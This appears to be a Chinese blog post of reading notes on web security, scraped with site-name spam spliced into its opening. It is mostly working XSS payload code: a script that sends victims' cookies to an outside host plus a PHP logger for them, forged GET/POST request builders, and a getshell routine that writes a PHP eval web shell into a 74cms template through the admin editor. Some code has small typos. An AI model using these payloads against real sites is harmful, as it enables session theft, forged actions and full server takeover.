xss payload可以使用富客户端文本书写,涛涛电脑知识网,大多数用javascript,涛涛电脑知识网,少部分用actionscript等等。
1.盗取cookie,发起cookie劫持
使用xss漏洞插入cookie.js
cookie.js代码:
view sourceprint?1 var img = document.createElement("img");
2
3 img.src = " www.2cto.com /cookie.php?cookie="+escape(documents.cookie);
4
5 document.body.appendChild(img);
cookie.php代码
view sourceprint?1 <?php
2
3 $file = fopen("cookie.txt","a");
4
5 fwrite($file,$_GET['cookie']);
6
7 fclose($file);
8
9 ?>
2.构造GET和POST请求
get.js代码:
view sourceprint?1 var img = document.createElement("img");
2
3 img.src = "一个可以使用的get请求链接";
4
5 document.body.appendChild(img);
post.js代码:
代码1:(DOM节点方式)
view sourceprint?01 var f = document.createElement("form");
02
03 f.action ="";
04
05 f.method = "post";
06
07 document.body.appendChild(f);
08
09 var i1 = document.createElement("input");
10
11 i1.name = "xxx";
12
13 i1.value = "xxxx";
14
15 f.appendChild(i1);
16
17 var i2 = document.createElement("input");
18
19 i2.name = "aaa";
20
21 i2.value = "aaa";
22
23 f.appendChild(i2);
24
25 f.submit();
代码2:
view sourceprint?1 var dd = document.createElement("div");
2
3 document.body.appendChild(dd);
4
5 dd.innerHTML ='<form action="" method="post" id="xssform" name="mbform">'+'<input type="hidden" value="xxxx" name="xxx" />'+'<input type="text" value="aaaa" name="aaa" />'+'</form>';
6
7 document.getElementById("xssform").submit();
代码3:(使用XMLHttpRequest)
view sourceprint?01 var url = "";
02
03 var postStr = "aaa=aaaa&xxx=xxxx";
04
05 var ajax = null;
06
07 if(windows.XMLHttpRequest)
08
09 {
10
11 ajax = new XMLHttpRequest();
12
13 }
14
15 else if(window.ActiveXObject)
16
17 {
18
19 ajax = new ActiveXObject("Microsoft.XMLHTTP");//ie6和一下老版本
20
21 }
22
23 else
24
25 {
26
27 return;
28
29 }
30
31 ajax.open("POST", url , true);
32
33 ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
34
35 ajax.send(postStr);
36
37 //ajax.open("GET", url, true);
38
39 //ajax.send(null);
40
41 ajax.onreadystatechange = function()
42
43 {
44
45 if(ajax.readyState == 4 && ajax.status == 200)
46
47 {
48
49 //alert("Done!");
50
51 }
52
53 }
-------------------
3.xss钓鱼
4.浏览器识别和用户安装软件识别
5.css history hack
读《白帽子讲web安全》笔记
---------------------
xxs payload getshell 实例:
骑士cms getshell
view sourceprint?01 //构造好的能写入一句话的连接
02
03 var Shelldata='tpl_content=%3C%3Fphp%20eval%28%24_POST%5Bxdxd%5D%29%3F%3E&tpl_dir=default&tpl_name=footer.php&del_Submit=%B1%A3%B4%E6';
04
05 try
06
07 {
08
09 //调用XMLHttpRequest
10 var xml = window.XMLHttpRequest ? (new XMLHttpRequest()) : (new ActiveXObject('Microsoft.XMLHTTP'));
11
12 xml.open("POST",'admin_templates.php?act=do_edit',false);
13 xml.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
14 xml.onreadystatechange = function()
15 {
16 if(xml.readyState == 4)
17
18 {
19
20 }
21 }
22 xml.send(Shelldata);
23 }
24 catch(e)
25
26 {
27
28 }
作者 L.N的博客